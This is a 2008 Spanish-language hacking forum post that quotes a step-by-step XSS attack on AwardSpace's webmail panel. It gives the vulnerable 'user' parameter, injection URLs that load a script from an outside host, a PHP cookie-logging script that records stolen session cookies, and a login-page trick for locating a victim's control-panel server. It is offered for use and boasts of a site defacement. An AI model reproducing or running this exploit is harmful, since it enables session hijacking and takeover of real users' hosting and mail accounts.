hacker


Ingresar con nombre de usuario, contraseña y duración de la sesión
| Portal Hacker | Editorial | Descargas | Ezine |
Inicio Ayuda Ingresar Registrarse
26 de Julio de 2008, 12:41:59
Noticias: Participa en el primer torneo matemático de CPH
Para ver este enlace Registrate o Inicia Sesion
Aquí

+  Foros pOrtal Hacker
|-+  Hacktivismo
| |-+  Bugs y Exploits (Moderadores: CHR0N05, vengador de las sombras)
| | |-+  XSS en AwardSpace Discovered by Knet		 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: XSS en AwardSpace Discovered by Knet  (Leído 299 veces)
vengador de las sombras
Moderador
*****
Desconectado Desconectado

Mensajes: 645


¿4R3 U 1NF3KT3D?


Ver Perfil
« : 07 de Abril de 2008, 11:46:31 »
Cito textualmente el post del descubridor:
Citar
el Bug de XSS se encuentra en los Paneles de WebMail.

afecta tanto a las cuentas WebMail como a las cuentas de Hosting

se ubica en el path /mail2/ de los cpanels de AwardSpace, el script se llama IlohaMail

https://cp1.awardspace.com/mail2/

la variable vulnerable : ?user=

que podemos usar para colar codigo Html así :

https://cp1.awardspace.com/mail2/source/index.php?user=”><h1>Www.F-security.Com.Ar</h1>

(: ahí todo dicho con un poco de creatividad :

https://cp1.awardspace.com/mail2/source/index.php?user=”><script language=JavaScript type=text/javascript src=http://f-security.com.ar/knet.js></script>

teniendo knet.js de contenido  alert(”Vulnerable:\n”+document.cookie)

lo que hice en el vídeo fue direccionar a un archivo .php que guardaba los pedidos get en un archivo

( guardmela_cook ies.txt )

contenido del archivo php:

<?
$cookie=$_GET[c];
$fp=fopen(’public.txt’,'a’);
fwrite($fp,”\n”.’Cookie:’.”\n”.htmlentities($cookie).”\n”.’====================================================’.”\n”);
fclose($fp);
header(”Location:http://www.google.com/”);
?>

lo demas a su imaginación.

un pequeño detalle :

si a la víctima a robar usa un número de cpanel distinto, el robo de cookies no tendría efecto.

por logica necesitamos saber de alguna manera en que cpanel se aloja la victima, yo lo encontre (:

se hace así :

nos dirigimos a http://www.awardspace.com/login.html

y colocamos el supuesto user de la web y una contraseña cualquiera

si es correcto el user nos redirigira al cpanel donde se hostea Wink

EJ: pongan.   user:rooteam2 pass:knet

y veran que los redirige al cpanel numero 8

entonces nos dara la posibilidad de crear nuestro xss personalizado para el cpanel webmail número 8

algunas herramientas para este xss ONLINE:

www.f-security.com.ar/public.js

www.f-security.com.ar/public.php

www.f-security.com.ar/public.txt

Webs vulnerables:

http://www.google.com.ar/search?hl=es&q=related%3Aawardspace.com&btnG=Buscar&meta=

incluidos zettahost y hostsecure Wink

Este bug ha sido famoso por el deface de Knet a rooteams. Si quereis ver el video de como se realizó el deface: http://remoteexecution.org/foro/index.php?topic=2553



PD:No lo consideren Spam, es info muy útil.
En línea

Para ver este enlace Registrate o Inicia Sesion
ArgeniversoHac k Forums

-----------------------------------------

Para ver este enlace Registrate o Inicia Sesion
Criptografía desde 0
  - 
Para ver este enlace Registrate o Inicia Sesion
Crear un Mail Bomber en Perl
  - 
Para ver este enlace Registrate o Inicia Sesion
Hackear y Backdorizar con CryptCat
  - 
Para ver este enlace Registrate o Inicia Sesion
XSS:  Saltándonos las Magic Quotes y otros filtros
  - 
Para ver este enlace Registrate o Inicia Sesion
SQL Injection: Introducción al método del error
  - 
Para ver este enlace Registrate o Inicia Sesion
Aumentar hasta 10Mb la memoria de tu Motorola
----------------------------
NO RESPONDO PREGUNTAS POR MP!!
Páginas: [1] Ir Arriba Imprimir 
« anterior próximo »
Ir a:  


Ingresar con nombre de usuario, contraseña y duración de la sesión

Powered by SMF 1.1.5 | SMF © 2006-2008, Simple Machines LLC hacker

Juegos gratis - Articulos PHP - Juegos - Trucos - Letras - Juegos - Juegos Online